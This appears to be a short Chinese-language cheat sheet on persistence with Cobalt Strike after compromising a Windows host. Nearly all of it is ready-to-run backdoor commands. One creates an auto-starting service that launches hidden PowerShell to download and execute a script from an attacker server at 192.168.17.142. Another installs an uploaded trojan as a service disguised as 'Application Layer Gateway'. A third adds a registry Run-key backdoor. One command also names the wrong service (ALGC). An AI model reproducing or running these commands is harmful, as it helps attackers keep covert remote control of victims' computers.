cobaltstrike权限维持

权限维持：简单来说就是让我们可以更久的控制一台电脑
生成监听后门：提权之后我们要创建一个监听后门

shell sc create "ALGS" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.17.142:80/a'))\"
#生成一个ALGS服务 
shell SC config "ALGS" start= auto      #设置name服务为自动 
shell SC description "ALGS" "description"    #设置服务描述
shell net start "ALGS"     #启动服务
shell SC delete "ALGS"      #删除服务

设置完后门服务后，目标主机重启后不断向攻击服务器发送数据

通过可执行文件留下维持权限的后门：首先要在目标主机上传木马，并记住路径

生成win service exe payload
sc create ALGS binpath= "C:\Users\Administrator\Contacts\payload.exe" start= auto displayname= "Application Layer Gateway Se"
sc start ALGS
sc delete ALGS 
sc stop ALGC     //ALGS是服务名，displayname是服务描述

通过注册表留后门

shell reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Keyname" /t REG_SZ /d "C:\Windows\system32\a.exe" /f